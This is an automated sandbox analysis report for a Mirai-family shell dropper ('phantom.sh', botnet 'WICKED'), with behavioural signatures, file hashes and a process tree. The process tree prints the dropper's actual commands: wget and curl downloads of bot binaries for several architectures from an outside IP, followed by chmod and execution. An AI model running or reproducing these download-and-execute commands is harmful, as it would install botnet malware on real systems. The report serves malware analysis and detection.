Analysis

  • max time kernel
    96s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    23/03/2025, 02:52

General

  • Target
    phantom.sh
  • Size
    1KB
  • MD5
    b25643d9ed071bba8af0ef060b5180bf
  • SHA1
    12c13e5c16cabcd24f9c38b750acd5be92df73ec
  • SHA256
    2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf
  • SHA512
    5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9

Malware Config

Extracted

Family

mirai

Botnet

WICKED


Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 12 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 6 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads process memory 1 TTPs 59 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 6 IoCs
  • Reads system network configuration 1 TTPs 6 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 19 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/phantom.sh
    /tmp/phantom.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://157.245.211.199/bins/x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://157.245.211.199/bins/x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/cat
      cat x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x dbot phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
        2⤵
        • File and Directory Permissions Modification
        PID:738
      • /tmp/dbot
        ./dbot Payload
        2⤵
          PID:739
        • /usr/bin/wget
          wget http://157.245.211.199/bins/mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:741
        • /usr/bin/curl
          curl -O http://157.245.211.199/bins/mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:742
        • /bin/cat
          cat mips
          2⤵
          • System Network Configuration Discovery
          PID:743
        • /bin/chmod
          chmod +x dbot mips phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
          2⤵
          • File and Directory Permissions Modification
          PID:744
        • /tmp/dbot
          ./dbot Payload
          2⤵
            PID:745
          • /usr/bin/wget
            wget http://157.245.211.199/bins/mpsl
            2⤵
            • Writes file to tmp directory
            PID:747
          • /usr/bin/curl
            curl -O http://157.245.211.199/bins/mpsl
            2⤵
            • Writes file to tmp directory
            PID:748
          • /bin/cat
            cat mpsl
            2⤵
              PID:749
            • /bin/chmod
              chmod +x dbot mips mpsl phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
              2⤵
              • File and Directory Permissions Modification
              PID:750
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              PID:751
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm
              2⤵
              • Writes file to tmp directory
              PID:753
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:762
            • /bin/chmod
              chmod +x arm dbot mips mpsl phantom.sh systemd-private-431a5c22c369426d8da8ffd9746f5eb3-systemd-timedated.service-cH0Sj8 x86
              2⤵
              • File and Directory Permissions Modification
              PID:775
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:777
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm5
              2⤵
              • Writes file to tmp directory
              PID:838
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:839
            • /bin/chmod
              chmod +x arm arm5 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:845
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:846
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm6
              2⤵
              • Writes file to tmp directory
              PID:848
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm6
              2⤵
              • Writes file to tmp directory
              PID:851
            • /bin/chmod
              chmod +x arm arm5 arm6 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:853
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:854
            • /usr/bin/wget
              wget http://157.245.211.199/bins/arm7
              2⤵
              • Writes file to tmp directory
              PID:856
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/arm7
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:859
            • /bin/chmod
              chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh x86
              2⤵
              • File and Directory Permissions Modification
              PID:861
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Reads process memory
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:862
            • /usr/bin/wget
              wget http://157.245.211.199/bins/spc
              2⤵
              • Writes file to tmp directory
              PID:864
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/spc
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:867
            • /bin/chmod
              chmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh spc x86
              2⤵
              • File and Directory Permissions Modification
              PID:869
            • /tmp/dbot
              ./dbot Payload
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:870
            • /usr/bin/wget
              wget http://157.245.211.199/bins/m68k
              2⤵
              • Writes file to tmp directory
              PID:872
            • /usr/bin/curl
              curl -O http://157.245.211.199/bins/m68k
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:875

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • /tmp/arm

            Filesize

            65KB

            MD5

            c41a79699de953380428ae97410bb85f

            SHA1

            747a2e1757455604ec6ab089eeec07744b71d79c

            SHA256

            753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf

            SHA512

            c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c

          • /tmp/arm5

            Filesize

            41KB

            MD5

            2b9ff651d116fd4220b9ef064edc87ed

            SHA1

            82a30aec3a92d6b9aa928c49c775bdc5c7f368a7

            SHA256

            a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e

            SHA512

            e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea

          • /tmp/arm6

            Filesize

            73KB

            MD5

            9b4a9ffc8981f7af2b338260b47f8ae7

            SHA1

            5558be7ec4a318c25c659764ebacdc9ca066fdcd

            SHA256

            b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d

            SHA512

            80b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a

          • /tmp/arm7

            Filesize

            140KB

            MD5

            a4f6cf4e6edb03734e3fd5d250dfa63b

            SHA1

            1297b2b89a27d8c3615548099cd38cbab48dc406

            SHA256

            5cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31

            SHA512

            5e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78

          • /tmp/m68k

            Filesize

            65KB

            MD5

            0a548e5e31b00bd078466d15eb16e546

            SHA1

            0203328ab86cda8492ca3ea86528c4272394e7e8

            SHA256

            3235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3

            SHA512

            fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee

          • /tmp/m68k

            Filesize

            64KB

            MD5

            5e8285b6dc02bd16d38d52e474dc47ef

            SHA1

            b333c8b8acb9202152195e31942c51946dda7fc1

            SHA256

            9db83fadccad4844c9d3cc2295e4611b9523448eeaece1bd67ae7ff2139003a9

            SHA512

            f61c87b8c99686709b64390831810d5c5325740d4b7894768e528928ac5c7b74dad750ee335e809f3d14cae447ee5d74ca664f1c19d385061a9318bc04f5bfa9

          • /tmp/mips

            Filesize

            82KB

            MD5

            7f3a7052000e43a7ea7b3831d3471c53

            SHA1

            ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0

            SHA256

            740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27

            SHA512

            a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28

          • /tmp/mpsl

            Filesize

            82KB

            MD5

            d10cde406bb6e741caa075ae3eb1b59b

            SHA1

            3b8761c325ff59e67ced6151d5c0b483e7009ff0

            SHA256

            33aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275

            SHA512

            d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d

          • /tmp/spc

            Filesize

            65KB

            MD5

            19d915863ed88ad6cfbed0a9e91875b4

            SHA1

            2a162911ba6df6689052c4f4f215e2a509e875e6

            SHA256

            83ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba

            SHA512

            b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a

          • /tmp/x86

            Filesize

            56KB

            MD5

            a7b4473399ce74c911ec86fe9f3a2295

            SHA1

            16ceb93a19944b099d8da7c0f42faa92954fd8e7

            SHA256

            5064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e

            SHA512

            32031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125